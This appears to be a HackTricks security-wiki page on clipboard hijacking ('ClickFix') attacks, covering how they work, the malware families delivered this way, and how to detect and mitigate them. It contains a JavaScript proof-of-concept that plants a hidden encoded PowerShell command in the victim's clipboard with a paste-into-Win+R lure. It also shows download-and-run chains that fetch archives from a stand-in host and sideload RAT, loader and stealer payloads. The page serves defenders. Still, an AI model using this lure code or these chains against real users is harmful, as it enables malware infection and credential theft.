Clipboard Hijacking (Pastejacking) Attacks
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
"Never paste anything you did not copy yourself." (old but still valid advice)
Overview
Clipboard hijacking, also known as pastejacking, abuses the fact that users routinely copy and paste commands without inspecting them. A malicious web page (or any JavaScript-capable context such as an Electron or other desktop application) programmatically places attacker-controlled text in the system clipboard. Victims are then encouraged, usually by carefully crafted social-engineering instructions, to press Win + R (Run dialog) or Win + X (Quick Link menu / PowerShell), or to open a terminal, and paste the clipboard contents, immediately executing arbitrary commands.
Because no file is downloaded and no attachment is opened, the technique bypasses most e-mail and web-content security controls that watch for attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns that deliver commodity malware families such as NetSupport RAT, the Latrodectus loader or Lumma Stealer.
JavaScript Proof-of-Concept
```html
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
  const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
  const done = () => alert('Now press Win+R , paste and hit Enter to fix the problem.');
  if (navigator.clipboard) {            // modern asynchronous Clipboard API
    navigator.clipboard.writeText(payload).then(done);
  } else {                              // legacy fallback used by older campaigns
    const ta = document.body.appendChild(document.createElement('textarea'));
    ta.value = payload; ta.select();
    document.execCommand('copy'); ta.remove(); done();
  }
}
</script>
```
Older campaigns used `document.execCommand('copy')`; newer ones rely on the asynchronous Clipboard API (`navigator.clipboard.writeText`).
The ClickFix / ClearFake Flow
- The user visits a typosquatted or compromised site (e.g. `docusign.sa[.]com`).
- The injected ClearFake JavaScript calls `unsecuredCopyToClipboard()`, which silently stores a Base64-encoded PowerShell one-liner in the clipboard.
- HTML instructions tell the victim: "Press Win + R, paste the command and hit Enter to fix the problem."
- `powershell.exe` runs and downloads an archive containing a legitimate executable alongside a malicious DLL (classic DLL sideloading).
- The loader decrypts further stages, injects shellcode and sets up persistence (e.g. a scheduled task), finally executing NetSupport RAT / Latrodectus / Lumma Stealer.
Example NetSupport RAT Chain
```powershell
powershell -nop -w hidden -enc <Base64>
# -> Decodes to (PowerShell syntax; the temp folder is $env:TEMP, not cmd's %TEMP%):
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile "$env:TEMP\f.zip"
Expand-Archive "$env:TEMP\f.zip" -DestinationPath "$env:TEMP\f"
& "$env:TEMP\f\jp2launcher.exe"   # legitimate binary, sideloads the malicious msvcp140.dll
```
- `jp2launcher.exe` (the legitimate Java WebStart launcher) looks in its own directory for `msvcp140.dll`.
- The malicious DLL resolves APIs dynamically with `GetProcAddress`, downloads two binaries (`data_3.bin`, `data_4.bin`) via `curl.exe`, decrypts them with the rolling XOR key `"https://google.com/"`, injects the final shellcode and unpacks `client32.exe` (NetSupport RAT) into `C:\ProgramData\SecurityCheck_v1\`.
Latrodectus Loader
```powershell
powershell -nop -enc <Base64> # Cloud Identificator: 2031
```
- Downloads `la.txt` with `curl.exe`.
- Runs a JScript downloader inside `cscript.exe`.
- Fetches an MSI payload that drops `libcef.dll` next to a signed application; DLL sideloading then loads it, which leads to shellcode and finally Latrodectus.
Lumma Stealer via MSHTA
```
mshta https://iplogger.co/xxxx =+\\xxx
```
The mshta call launches a hidden PowerShell script that retrieves `PartyContinued.exe`, extracts `Boat.pst` (a CAB), reconstructs `AutoIt3.exe` through `extrac32` and file concatenation, and finally runs an `.a3x` script that exfiltrates browser credentials to `sumeriavgv.digital`.
Detection & Hunting
Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
- Windows Registry: `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` keeps a history of Win + R commands (one value per command, ordered by `MRUList`). Look for unusual Base64 / obfuscated entries.
- Security Event ID 4688 (Process Creation) with `ParentProcessName` == `explorer.exe` and `NewProcessName` in {`powershell.exe`, `wscript.exe`, `mshta.exe`, `curl.exe`, `cmd.exe`}; the equivalent Sysmon Event ID 1 fields are `ParentImage` / `Image`. Enable "Include command line in process creation events" so the `-enc` blob is captured in the event.
- Event ID 4663 (object access; requires a file-system SACL) for file creations under `%LocalAppData%\Microsoft\Windows\WinX\` or temporary folders right before the suspicious 4688 event.
- EDR clipboard sensors (if present): correlate a Clipboard Write followed immediately by a new PowerShell process.
Mitigations
- Browser hardening: disable clipboard write access (`dom.events.asyncClipboard.clipboardItem` etc.) or require a user gesture.
- Security awareness: teach users to type sensitive commands themselves, or to paste them into a text editor first and read them before running anything.
- PowerShell Constrained Language Mode plus Application Control (WDAC / AppLocker) to block arbitrary one-liners. Execution Policy alone is not a security boundary; the `-enc` one-liners above never touch a script file, so it does not stop them.
- Where end users do not need it, the Group Policy "Remove Run menu from Start Menu" (Explorer `NoRun`) also disables the Win + R dialog that these lures depend on.
- Network controls: block outbound requests to known pastejacking and malware C2 domains.
Related Tricks
- Discord Invite Hijacking often abuses the same ClickFix approach after luring users into a malicious server.